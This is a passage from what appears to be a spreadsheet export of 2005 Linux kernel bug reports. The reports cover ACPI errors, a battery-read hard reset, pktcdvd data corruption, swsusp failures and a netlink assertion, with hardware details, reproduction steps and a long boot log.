01:00.0 PCI bridge: Intel Corp. 6702PXH PCI Express-to-PCI Bridge A (rev 09) 01:00.1 PIC: Intel Corp. 6700/6702PXH I/OxAPIC Interrupt Controller A (rev 09) 04:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5721 Gigabit Ethernet PCI Express (rev 11) 05:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5721 Gigabit Ethernet PCI Express (rev 11) Software Environment: Linux version 2.6.11-rc4 (root@gw1) (gcc version 3.3.4) #1 SMP Mon Feb 14 06:47:58 CET 2005 # /usr/src/linux-2.6.11-rc4/scripts/ver_linux Linux gw1 2.6.11-rc4 #1 SMP Mon Feb 14 06:47:58 CET 2005 i686 unknown unknown GNU/Linux Gnu C 3.3.4 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.12p mount 2.12p module-init-tools 3.1 e2fsprogs 1.35 reiserfsprogs line reiser4progs line quota-tools 3.12. PPP 2.4.2 Linux C Library 2.3.3 Dynamic linker (ldd) 2.3.3 Linux C++ Library 5.0.6 Procps 3.2.3 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 /usr/src/linux-2.6.11-rc4/scripts/ver_linux: line 90: udevinfo: command not found Modules Loaded bonding # cat /proc/net/bonding/bond0 Ethernet Channel Bonding Driver: v2.6.1 (October 29, 2004) Bonding Mode: fault-tolerance (active-backup) Primary Slave: None Currently Active Slave: eth1 MII Status: up MII Polling Interval (ms): 100 Up Delay (ms): 0 Down Delay (ms): 0 Slave Interface: eth0 MII Status: up Link Failure Count: 3 Permanent HW addr: 00:30:48:XX:XX:XX Slave Interface: eth1 MII Status: up Link Failure Count: 0 Permanent HW addr: 00:30:48:XX:XX:XX # cat /proc/net/vlan/config VLAN Dev name | VLAN ID Name-Type: VLAN_NAME_TYPE_PLUS_VID_NO_PAD vlan1 | 1 | bond0 vlan2 | 2 | bond0 vlan6 | 6 | bond0 vlan33 | 33 | bond0 vlan5 | 5 | bond0 Problem Description: I use keepalived for vrrpd. Sometimes, when I restart (kill &amp; start) keepalived daemon kernel logs: KERNEL: assertion (!atomic_read(&amp;sk-&gt;sk_rmem_alloc)) failed at net/netlink/af_netlink.c (122) vlan1: del 01:00:5e:00:00:12 mcast address from master interface The vlan1 device is used for vrrpd communication between two routers. It is created over the bound0 interface (eth0+eth1 in active-backup mode). Anyway, everything seems to work but this message is not very nice. Steps to reproduce: # killall keepalived</t>
  </si>
  <si>
    <t>system reset when battery is read and i8xx_tco driver loaded</t>
  </si>
  <si>
    <t>2.6.11-rc2-bk4-9</t>
  </si>
  <si>
    <t>2005-02-25 09:01 UTC</t>
  </si>
  <si>
    <t>2005-08-22 17:16 UTC</t>
  </si>
  <si>
    <t>This is a HP nx5000 with two battery bays (one in use). Loading ACPI modules does not harm. Trying to read out battery state results in a hard reset of the CPU (power off, reboot). DSDT can be found: http://stio1.fh-wuerzburg.de/student/i31990/dsdt.dsl Full acpi debug output shortly before hard reset (echo 0x007FFFFF &gt;/proc/acpi/debug_level; cat /proc/acpi/battery/C13B/state) can be found here: http://stio1.fh-wuerzburg.de/student/i31990/acpi_hard_reset_full_debug</t>
  </si>
  <si>
    <t>unmatched comment end : arch/arm/mm/proc-arm1020.S</t>
  </si>
  <si>
    <t>2.6.11-rc5</t>
  </si>
  <si>
    <t>2005-02-28 02:28 UTC</t>
  </si>
  <si>
    <t>2005-07-01 15:29 UTC</t>
  </si>
  <si>
    <t>AE_AML_BUFFER_LIMIT - D865GBF</t>
  </si>
  <si>
    <t>2005-02-28 06:22 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: Intel D865GBF Desktop Board, BIOS: BF86510A.86A.0043.P09.0308251408 Software Environment: Problem Description: Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init ACPI-1138: *** Error: Method execution failed [\MCTH] (Node dff2ee60), AE_AML_BUFFER_LIMIT ACPI-1138: *** Error: Method execution failed [\OSFL] (Node dff2e560), AE_AML_BUFFER_LIMIT ACPI-1138: *** Error: Method execution failed [\_SB_.SYSM._CRS] (Node dff14fa0), AE_AML_BUFFER_L IMIT ACPI-0158: *** Error: Method execution failed [\_SB_.SYSM._CRS] (Node dff14fa0), AE_AML_BUFFER_L IMIT pnp: PnPACPI: METHOD_NAME__CRS failure for PNP0c01 pnp: PnP ACPI: found 12 devices Steps to reproduce:</t>
  </si>
  <si>
    <t>the fan never works when ACPI is on, when the laptop is very hot, it shut down suddenly</t>
  </si>
  <si>
    <t>2.6.11-rc2</t>
  </si>
  <si>
    <t>2005-02-28 07:05 UTC</t>
  </si>
  <si>
    <t>borge3</t>
  </si>
  <si>
    <t>2005-11-17 07:16 UTC</t>
  </si>
  <si>
    <t>Distribution: debian sid Hardware Environment: laptop compaq evo N400c Software Environment: Problem Description: ACPI works well exept for the fan, it never works. When I use the laptop, it become hotter and then it shutdown. Steps to reproduce: run linux on a laptop Compaq Evo N400c with ACPI enable and do a task which uses much resources ( for example, a kernel compilation )</t>
  </si>
  <si>
    <t>ACPI D-states for PCI devices</t>
  </si>
  <si>
    <t>2005-03-03 01:49 UTC</t>
  </si>
  <si>
    <t>2005-12-06 09:59 UTC</t>
  </si>
  <si>
    <t>PCI devices and legacy devices driver should utinize ACPI power management enhancement.</t>
  </si>
  <si>
    <t>ADM1021 Driver Does not report remote Temp alarms.</t>
  </si>
  <si>
    <t>2005-03-03 22:57 UTC</t>
  </si>
  <si>
    <t>Jayakrishnan</t>
  </si>
  <si>
    <t>2005-08-08 12:17 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Kernel : 2.6.7 Hardware Environment: PC/ I386 Software Environment: Problem Description: In the ADM1021 Sensor driver temperature alarm is masked with a constant 0xEC. For the CHIP ADM1021A, bit 4 is RHIGH, because of the mask the RHIGH Flag is cleared in the alarm value. so the Remote Temp High is never reported. Steps to reproduce:</t>
  </si>
  <si>
    <t>pktcdvd packet-writing device suffers from data corruption</t>
  </si>
  <si>
    <t>2.6.10, 2.6.11</t>
  </si>
  <si>
    <t>2005-03-04 21:09 UTC</t>
  </si>
  <si>
    <t>thompson</t>
  </si>
  <si>
    <t>2005-06-19 20:08 UTC</t>
  </si>
  <si>
    <t>Distribution:Gentoo Hardware Environment:2xpII@400 360M, ide disk, atapi cd/dvd burner, cdrw and dvd+rw media Software Environment:pktcdvd driver configured with and without write caching. Problem Description: pktcdvd seems to work most of the time, but when exposed to a more intensive copy, such as copying the entire 2.6.10 kernel tree to disc, file corruption results. (files are correct size, but either partially, or entirely zero'd out) Ive only been able to get this using the udf filesystem, when there is a lot of pressure on the io/cache (eg. fs cache fills up and io stalls while waiting for the relatively slow write process to allow progress.) I have only gotten this to happen on udf filesystems, writing to ext2 on disc seems to go faster, and not have stalls. No hardware errors or anything untoward are reported by the kernel. Steps to reproduce: (limit memory to 360meg, or less with a full desktop running) (insert dvd+rw in drive) mkudffs /dev/cdrom pktsetup dvd /dev/cdrom mount -tudf -o rw,noatime /dev/pktcdvd/dvd /cdrom cp -av 2.6.10/ /cdrom sync diff -ru /cdrom/2.6.10 2.6.10</t>
  </si>
  <si>
    <t>swsusp fails to suspend if CONFIG_DEBUG_PAGEALLOC is also enabled</t>
  </si>
  <si>
    <t>2005-03-06 03:00 UTC</t>
  </si>
  <si>
    <t>2005-03-08 15:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: AMD Sempron 3100+ (32-bit K8) desktop with 1.5GB RAM; also reproduced on a Toshiba Portege 3500 laptop with 512MB RAM during 2.6.11-rc, although I had no clue what was causing the bug at that point Software Environment: .config is similar to what ships in 2.6.10-2.6.11 "rawhide"/"fc-devel" kernels; this means ACPI is enabled Problem Description: swsusp normally works, but if I enable CONFIG_DEBUG_PAGEALLOC, it breaks -- after "PM: snapshotting memory", swsusp never gets to the "critical section" and it kind of bounces back from the suspend attempt, for lack of a better way for me to describe the effect. I first hit this when trying to hack a vendor kernel into supporting swsusp (guess which one ;) -- sometimes things worked and sometimes they didn't. I later reproduced it on mainline 2.6.11-rc1 or -rc2 -- I don't remember which -- but it seemed to go away for -rc4. Then I hit the problem again on 2.6.11-rc5 and 2.6.11 final. Unfortunately it took me several weeks (i.e. until today) to figure out that I was being sloppy with my .configs and it was actually changes in those that were to blame for my troubles. I just finished narrowing it down to CONFIG_DEBUG_PAGEALLOC. Steps to reproduce: 1. Using either a pristine mainline tarball (with vanilla patches if you want a -rc or -bk kernel), or a hacked Fedora Core 3/4 kernel SRPM, compile a kernel with swsusp support. (Compared to the standard Fedora Core .config, set CONFIG_SOFTWARE_SUSPEND=y and CONFIG_PM_STD_PARTITION="".) 2. Install this new kernel. 3. If needed, edit /etc/grub.conf to make the new kernel the default. Also make sure that the new kernel has a "resume=" parameter 4. Reboot into the new kernel. 5. Log in as root (or log in as a normal user and become root). 6. echo 4 &gt; /proc/acpi/sleep</t>
  </si>
  <si>
    <t>wrong url in get_dvb_firmware script</t>
  </si>
  <si>
    <t>2005-03-06 12:43 UTC</t>
  </si>
  <si>
    <t>Kim Asplund</t>
  </si>
  <si>
    <t>2006-03-22 15:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: P4 3,2G Software Environment: Problem Description: dibusb dvb firmvare , wrong url in get_dvb_firmware script Steps to reproduce: Documentation/dvb/get_dvb_firmware Line 225 should read: my $url = "http://linuxtv.org/cgi-bin/viewcvs.cgi/*checkout*/dvb-kernel/firmware/dvb-dibusb-5.0.0.11.fw?rev=1.1&amp;content-type=text/plain"; Not: my $url = http://linuxtv.org/cgi-bin/cvsweb.cgi/dvb-kernel/firmware/dvb-dibusb-5.0.0.11.fw?rev=1.1&amp;content-type=text/plain";</t>
  </si>
  <si>
    <t>ACPI-0562: *** Warning: Type override - [DEB_] had invalid type</t>
  </si>
  <si>
    <t>2.4.30-pre2-bk3</t>
  </si>
  <si>
    <t>2005-03-08 02:16 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: Intel 7501VW2 server, see my other ACPI bugreports for this server if you need dmidecode or acpidump outputs Software Environment: linux-2.4.30-pre2-bk3 Problem Description: Mar 7 14:29:56 oxygen Linux version 2.4.30-pre2-bk3 (root@oxygen) (gcc version 3.3.4 20040623 (Gentoo Linux 3.3.4-r1, ssp-3.3 .2-2, pie-8.7.6)) #3 SMP Mon Mar 7 13:35:40 MET 2005 Mar 7 14:29:56 oxygen BIOS-provided physical RAM map: Mar 7 14:29:56 oxygen BIOS-e820: 0000000000000000 - 000000000009a400 (usable) Mar 7 14:29:56 oxygen BIOS-e820: 000000000009a400 - 00000000000a0000 (reserved) Mar 7 14:29:56 oxygen BIOS-e820: 00000000000e8000 - 0000000000100000 (reserved) Mar 7 14:29:56 oxygen BIOS-e820: 0000000000100000 - 00000000efff0000 (usable) Mar 7 14:29:56 oxygen BIOS-e820: 00000000efff0000 - 00000000effff000 (ACPI data) Mar 7 14:29:56 oxygen BIOS-e820: 00000000effff000 - 00000000f0000000 (ACPI NVS) Mar 7 14:29:56 oxygen BIOS-e820: 00000000fec00000 - 00000000fed00400 (reserved) Mar 7 14:29:56 oxygen BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) Mar 7 14:29:56 oxygen BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) Mar 7 14:29:56 oxygen BIOS-e820: 0000000100000000 - 0000000190000000 (usable) Mar 7 14:29:56 oxygen 5504MB HIGHMEM available. Mar 7 14:29:56 oxygen 896MB LOWMEM available. Mar 7 14:29:56 oxygen found SMP MP-table at 000ff780 Mar 7 14:29:56 oxygen hm, page 000ff000 reserved twice. Mar 7 14:29:56 oxygen hm, page 00100000 reserved twice. Mar 7 14:29:56 oxygen hm, page 000f1000 reserved twice. Mar 7 14:29:56 oxygen hm, page 000f2000 reserved twice. Mar 7 14:29:56 oxygen On node 0 totalpages: 1638400 Mar 7 14:29:56 oxygen zone(0): 4096 pages. Mar 7 14:29:56 oxygen zone(1): 225280 pages. Mar 7 14:29:56 oxygen zone(2): 1409024 pages. Mar 7 14:29:56 oxygen ACPI: RSDP (v000 INTEL ) @ 0x000ff9b0 Mar 7 14:29:56 oxygen ACPI: RSDT (v001 INTEL SWV25 0x00000001 MSFT 0x01000000) @ 0xefff0000 Mar 7 14:29:56 oxygen ACPI: FADT (v001 INTEL SWV25 0x00000001 MSFT 0x01000000) @ 0xefff0030 Mar 7 14:29:56 oxygen ACPI: MADT (v001 INTEL SWV25 0x00000001 MSFT 0x01000000) @ 0xefff00b0 Mar 7 14:29:56 oxygen ACPI: OEMR (v001 INTEL SWV25 0x00000001 MSFT 0x01000000) @ 0xefff0140 Mar 7 14:29:56 oxygen ACPI: DSDT (v001 INTEL SWV25 0x00000100 INTL 0x20020918) @ 0x00000000 Mar 7 14:29:56 oxygen ACPI: Local APIC address 0xfee00000 Mar 7 14:29:56 oxygen ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Mar 7 14:29:56 oxygen Processor #0 Pentium 4(tm) XEON(tm) APIC version 20 Mar 7 14:29:56 oxygen ACPI: LAPIC (acpi_id[0x01] lapic_id[0x06] enabled) Mar 7 14:29:56 oxygen Processor #6 Pentium 4(tm) XEON(tm) APIC version 20 Mar 7 14:29:56 oxygen ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) Mar 7 14:29:56 oxygen Processor #1 Pentium 4(tm) XEON(tm) APIC version 20 Mar 7 14:29:56 oxygen ACPI: LAPIC (acpi_id[0x03] lapic_id[0x07] enabled) Mar 7 14:29:56 oxygen Processor #7 Pentium 4(tm) XEON(tm) APIC version 20 Mar 7 14:29:56 oxygen ACPI: LAPIC_NMI (acpi_id[0x00] high level lint[0x1]) Mar 7 14:29:56 oxygen ACPI: LAPIC_NMI (acpi_id[0x01] high level lint[0x1]) Mar 7 14:29:56 oxygen ACPI: IOAPIC (id[0x08] address[0xfec00000] global_irq_base[0x0]) Mar 7 14:29:56 oxygen IOAPIC[0]: Assigned apic_id 8 Mar 7 14:29:56 oxygen IOAPIC[0]: apic_id 8, version 32, address 0xfec00000, IRQ 0-23 Mar 7 14:29:56 oxygen ACPI: IOAPIC (id[0x09] address[0xfec81000] global_irq_base[0x18]) Mar 7 14:29:56 oxygen IOAPIC[1]: Assigned apic_id 9 Mar 7 14:29:56 oxygen IOAPIC[1]: apic_id 9, version 32, address 0xfec81000, IRQ 24-47 Mar 7 14:29:56 oxygen ACPI: IOAPIC (id[0x0a] address[0xfec81400] global_irq_base[0x30]) Mar 7 14:29:56 oxygen IOAPIC[2]: Assigned apic_id 10 Mar 7 14:29:56 oxygen IOAPIC[2]: apic_id 10, version 32, address 0xfec81400, IRQ 48-71 Mar 7 14:29:56 oxygen ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) Mar 7 14:29:56 oxygen ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) Mar 7 14:29:56 oxygen Using ACPI (MADT) for SMP configuration information Mar 7 14:29:56 oxygen Kernel command line: root=/dev/sda2 console=ttyS1,38400n8 console=tty0 idebus=66 Mar 7 14:29:56 oxygen ide_setup: idebus=66 Mar 7 14:29:56 oxygen Initializing CPU#0 Mar 7 14:29:56 oxygen Detected 3056.896 MHz processor. Mar 7 14:29:56 oxygen Console: colour VGA+ 80x25 Mar 7 14:29:56 oxygen Calibrating delay loop... 6094.84 BogoMIPS Mar 7 14:29:56 oxygen Memory: 6209772k/6553600k available (2400k kernel code, 81212k reserved, 870k data, 168k init, 5373888k highmem) Mar 7 14:29:56 oxygen Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes) Mar 7 14:29:56 oxygen Inode cache hash table entries: 262144 (order: 9, 2097152 bytes) Mar 7 14:29:56 oxygen Mount cache hash table entries: 512 (order: 0, 4096 bytes) Mar 7 14:29:56 oxygen Buffer cache hash table entries: 524288 (order: 9, 2097152 bytes) Mar 7 14:29:56 oxygen Page-cache hash table entries: 524288 (order: 9, 2097152 bytes) Mar 7 14:29:56 oxygen CPU: Trace cache: 12K uops, L1 D cache: 8K Mar 7 14:29:56 oxygen CPU: L2 cache: 512K Mar 7 14:29:56 oxygen CPU: L3 cache: 1024K Mar 7 14:29:56 oxygen CPU: Physical Processor ID: 0 Mar 7 14:29:56 oxygen Intel machine check architecture supported. Mar 7 14:29:56 oxygen Intel machine check reporting enabled on CPU#0. Mar 7 14:29:56 oxygen CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU: Common caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen Enabling fast FPU save and restore... done. Mar 7 14:29:56 oxygen Enabling unmasked SIMD FPU exception support... done. Mar 7 14:29:56 oxygen Checking 'hlt' instruction... OK. Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [DEB_] had invalid type (Integer) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [MLIB] had invalid type (Integer) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [DATA] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [SIO_] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [LEDP] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [GPEN] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [GPST] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [WUES] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [WUSE] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [SBID] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen ACPI-0562: *** Warning: Type override - [SWCE] had invalid type (String) for Scope operator, changed to (Scope) Mar 7 14:29:56 oxygen POSIX conformance testing by UNIFIX Mar 7 14:29:56 oxygen mtrr: v1.40 (20010327) Richard Gooch (rgooch@atnf.csiro.au) Mar 7 14:29:56 oxygen mtrr: detected mtrr type: Intel Mar 7 14:29:56 oxygen CPU: Trace cache: 12K uops, L1 D cache: 8K Mar 7 14:29:56 oxygen CPU: L2 cache: 512K Mar 7 14:29:56 oxygen CPU: L3 cache: 1024K Mar 7 14:29:56 oxygen CPU: Physical Processor ID: 0 Mar 7 14:29:56 oxygen Intel machine check reporting enabled on CPU#0. Mar 7 14:29:56 oxygen CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU: Common caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU0: Intel(R) Xeon(TM) CPU 3.06GHz stepping 05 Mar 7 14:29:56 oxygen per-CPU timeslice cutoff: 1463.16 usecs. Mar 7 14:29:56 oxygen enabled ExtINT on CPU#0 Mar 7 14:29:56 oxygen ESR value before enabling vector: 00000000 Mar 7 14:29:56 oxygen ESR value after enabling vector: 00000000 Mar 7 14:29:56 oxygen Booting processor 1/1 eip 3000 Mar 7 14:29:56 oxygen Initializing CPU#1 Mar 7 14:29:56 oxygen masked ExtINT on CPU#1 Mar 7 14:29:56 oxygen ESR value before enabling vector: 00000000 Mar 7 14:29:56 oxygen ESR value after enabling vector: 00000000 Mar 7 14:29:56 oxygen Calibrating delay loop... 6107.95 BogoMIPS Mar 7 14:29:56 oxygen CPU: Trace cache: 12K uops, L1 D cache: 8K Mar 7 14:29:56 oxygen CPU: L2 cache: 512K Mar 7 14:29:56 oxygen CPU: L3 cache: 1024K Mar 7 14:29:56 oxygen CPU: Physical Processor ID: 0 Mar 7 14:29:56 oxygen Intel machine check reporting enabled on CPU#1. Mar 7 14:29:56 oxygen CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU: Common caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU1: Intel(R) Xeon(TM) CPU 3.06GHz stepping 05 Mar 7 14:29:56 oxygen Booting processor 2/6 eip 3000 Mar 7 14:29:56 oxygen Initializing CPU#2 Mar 7 14:29:56 oxygen masked ExtINT on CPU#2 Mar 7 14:29:56 oxygen ESR value before enabling vector: 00000000 Mar 7 14:29:56 oxygen ESR value after enabling vector: 00000000 Mar 7 14:29:56 oxygen Calibrating delay loop... 6107.95 BogoMIPS Mar 7 14:29:56 oxygen CPU: Trace cache: 12K uops, L1 D cache: 8K Mar 7 14:29:56 oxygen CPU: L2 cache: 512K Mar 7 14:29:56 oxygen CPU: L3 cache: 1024K Mar 7 14:29:56 oxygen CPU: Physical Processor ID: 3 Mar 7 14:29:56 oxygen Intel machine check reporting enabled on CPU#2. Mar 7 14:29:56 oxygen CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU: Common caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU2: Intel(R) Xeon(TM) CPU 3.06GHz stepping 05 Mar 7 14:29:56 oxygen Booting processor 3/7 eip 3000 Mar 7 14:29:56 oxygen Initializing CPU#3 Mar 7 14:29:56 oxygen masked ExtINT on CPU#3 Mar 7 14:29:56 oxygen ESR value before enabling vector: 00000000 Mar 7 14:29:56 oxygen ESR value after enabling vector: 00000000 Mar 7 14:29:56 oxygen Calibrating delay loop... 6107.95 BogoMIPS Mar 7 14:29:56 oxygen CPU: Trace cache: 12K uops, L1 D cache: 8K Mar 7 14:29:56 oxygen CPU: L2 cache: 512K Mar 7 14:29:56 oxygen CPU: L3 cache: 1024K Mar 7 14:29:56 oxygen CPU: Physical Processor ID: 3 Mar 7 14:29:56 oxygen Intel machine check reporting enabled on CPU#3. Mar 7 14:29:56 oxygen CPU: After generic, caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU: Common caps: bfebfbff 00000000 00000000 00000000 Mar 7 14:29:56 oxygen CPU3: Intel(R) Xeon(TM) CPU 3.06GHz stepping 05 Mar 7 14:29:56 oxygen Total of 4 processors activated (24418.71 BogoMIPS). Mar 7 14:29:56 oxygen cpu_sibling_map[0] = 1 Mar 7 14:29:56 oxygen cpu_sibling_map[1] = 0 Mar 7 14:29:56 oxygen cpu_sibling_map[2] = 3 Mar 7 14:29:56 oxygen cpu_sibling_map[3] = 2 Mar 7 14:29:56 oxygen ENABLING IO-APIC IRQs Mar 7 14:29:56 oxygen init IO_APIC IRQs Mar 7 14:29:56 oxygen IO-APIC (apicid-pin) 8-0, 8-16, 8-17, 8-18, 8-19, 8-20, 8-21, 8-22, 8-23, 9-0, 9-1, 9-2, 9-3, 9-4, 9-5, 9-6, 9-7, 9-8, 9-9, 9-10, 9-11, 9-12, 9-13, 9-14, 9-15, 9-16, 9-17, 9-18, 9-19, 9-20, 9-21, 9-22, 9-23, 10-0, 10-1, 10-2, 10- 3, 10-4, 10-5, 10-6, 10-7, 10-8, 10-9, 10-10, 10-11, 10-12, 10-13, 10-14, 10-15, 10-16, 10-17, 10-18, 10-19, 10-20, 10-21, 10- 22, 10-23 not connected. Mar 7 14:29:56 oxygen ..TIMER: vector=0x31 pin1=2 pin2=-1 Mar 7 14:29:56 oxygen Using local APIC timer interrupts. Mar 7 14:29:56 oxygen calibrating APIC timer ... Mar 7 14:29:56 oxygen ..... CPU clock speed is 3056.7870 MHz. Mar 7 14:29:56 oxygen ..... host bus clock speed is 132.9035 MHz. Mar 7 14:29:56 oxygen cpu: 0, clocks: 1329035, slice: 265807 Mar 7 14:29:56 oxygen CPU0&lt;T0:1329024,T1:1063216,D:1,S:265807,C:1329035&gt; Mar 7 14:29:56 oxygen cpu: 1, clocks: 1329035, slice: 265807 Mar 7 14:29:56 oxygen cpu: 3, clocks: 1329035, slice: 265807 Mar 7 14:29:56 oxygen cpu: 2, clocks: 1329035, slice: 265807 Mar 7 14:29:56 oxygen CPU2&lt;T0:1329024,T1:531600,D:3,S:265807,C:1329035&gt; Mar 7 14:29:56 oxygen CPU3&lt;T0:1329024,T1:265792,D:4,S:265807,C:1329035&gt; Mar 7 14:29:56 oxygen CPU1&lt;T0:1329024,T1:797408,D:2,S:265807,C:1329035&gt; Mar 7 14:29:56 oxygen checking TSC synchronization across CPUs: passed. Mar 7 14:29:56 oxygen Waiting on wait_init_idle (map = 0xe) Mar 7 14:29:56 oxygen All processors have done init_idle Mar 7 14:29:56 oxygen ACPI: Subsystem revision 20040326 Mar 7 14:29:56 oxygen PCI: PCI BIOS revision 2.10 entry at 0xfdb75, last bus=4 Mar 7 14:29:56 oxygen PCI: Using configuration type 1 Mar 7 14:29:56 oxygen ACPI: Interpreter enabled Mar 7 14:29:56 oxygen ACPI: Using IOAPIC for interrupt routing Mar 7 14:29:56 oxygen ACPI: System [ACPI] (supports S0 S1 S4 S5) Mar 7 14:29:56 oxygen ACPI: PCI Root Bridge [PCI0] (00:00) Mar 7 14:29:56 oxygen PCI: Probing PCI hardware (bus 00) Mar 7 14:29:56 oxygen PCI: Ignoring BAR0-3 of IDE controller 00:1f.1 Mar 7 14:29:56 oxygen Transparent bridge - Intel Corp. 82801BA/CA/DB/EB PCI Bridge Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] Mar 7 14:29:56 oxygen ACPI: Embedded Controller [EC0] (gpe 8) Mar 7 14:29:56 oxygen schedule_task(): keventd has not started Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 *9 10 11 12 14 15) Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 *11 12 14 15) Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 9 10 11 12 14 15) *0, disabled. Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 9 *10 11 12 14 15) Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P1._PRT] Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P5.P5P6._PRT] Mar 7 14:29:56 oxygen ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P5.P5P7._PRT] Mar 7 14:29:56 oxygen PCI: Probing PCI hardware Mar 7 14:29:56 oxygen 00:00:1d[A] -&gt; 8-16 -&gt; IRQ 16 level low Mar 7 14:29:56 oxygen 00:00:1d[B] -&gt; 8-19 -&gt; IRQ 19 level low Mar 7 14:29:56 oxygen 00:00:1f[B] -&gt; 8-17 -&gt; IRQ 17 level low Mar 7 14:29:56 oxygen 00:00:1f[C] -&gt; 8-18 -&gt; IRQ 18 level low Mar 7 14:29:56 oxygen 00:03:08[A] -&gt; 9-0 -&gt; IRQ 24 level low Mar 7 14:29:56 oxygen 00:03:08[B] -&gt; 9-3 -&gt; IRQ 27 level low Mar 7 14:29:56 oxygen 00:03:08[C] -&gt; 9-1 -&gt; IRQ 25 level low Mar 7 14:29:56 oxygen 00:03:08[D] -&gt; 9-2 -&gt; IRQ 26 level low Mar 7 14:29:56 oxygen 00:03:09[B] -&gt; 9-4 -&gt; IRQ 28 level low Mar 7 14:29:56 oxygen 00:03:09[C] -&gt; 9-5 -&gt; IRQ 29 level low Mar 7 14:29:56 oxygen 00:03:07[A] -&gt; 9-6 -&gt; IRQ 30 level low Mar 7 14:29:56 oxygen 00:03:07[B] -&gt; 9-7 -&gt; IRQ 31 level low Mar 7 14:29:56 oxygen 00:04:08[A] -&gt; 10-0 -&gt; IRQ 48 level low Mar 7 14:29:56 oxygen 00:04:08[B] -&gt; 10-3 -&gt; IRQ 51 level low Mar 7 14:29:56 oxygen 00:04:08[C] -&gt; 10-1 -&gt; IRQ 49 level low Mar 7 14:29:56 oxygen 00:04:08[D] -&gt; 10-2 -&gt; IRQ 50 level low Mar 7 14:29:56 oxygen 00:04:09[B] -&gt; 10-4 -&gt; IRQ 52 level low Mar 7 14:29:56 oxygen 00:04:09[C] -&gt; 10-5 -&gt; IRQ 53 level low Mar 7 14:29:56 oxygen number of MP IRQ sources: 15. Mar 7 14:29:56 oxygen number of IO-APIC #8 registers: 24. Mar 7 14:29:56 oxygen number of IO-APIC #9 registers: 24. Mar 7 14:29:56 oxygen number of IO-APIC #10 registers: 24. Mar 7 14:29:56 oxygen testing the IO APIC....................... Mar 7 14:29:56 oxygen Mar 7 14:29:56 oxygen IO APIC #8...... Mar 7 14:29:56 oxygen .... register #00: 08000000 Mar 7 14:29:56 oxygen ....... : physical APIC id: 08 Mar 7 14:29:56 oxygen ....... : Delivery Type: 0 Mar 7 14:29:56 oxygen ....... : LTS : 0 Mar 7 14:29:56 oxygen .... register #01: 00178020 Mar 7 14:29:56 oxygen ....... : max redirection entries: 0017 Mar 7 14:29:56 oxygen ....... : PRQ implemented: 1 Mar 7 14:29:56 oxygen ....... : IO APIC version: 0020 Mar 7 14:29:56 oxygen .... register #02: 00000000 Mar 7 14:29:56 oxygen ....... : arbitration: 00 Mar 7 14:29:56 oxygen .... register #03: 00000001 Mar 7 14:29:56 oxygen ....... : Boot DT : 1 Mar 7 14:29:56 oxygen .... IRQ redirection table: Mar 7 14:29:56 oxygen NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: Mar 7 14:29:56 oxygen 00 000 00 1 0 0 0 0 0 0 00 Mar 7 14:29:56 oxygen 01 00F 0F 0 0 0 0 0 1 1 39 Mar 7 14:29:56 oxygen 02 00F 0F 0 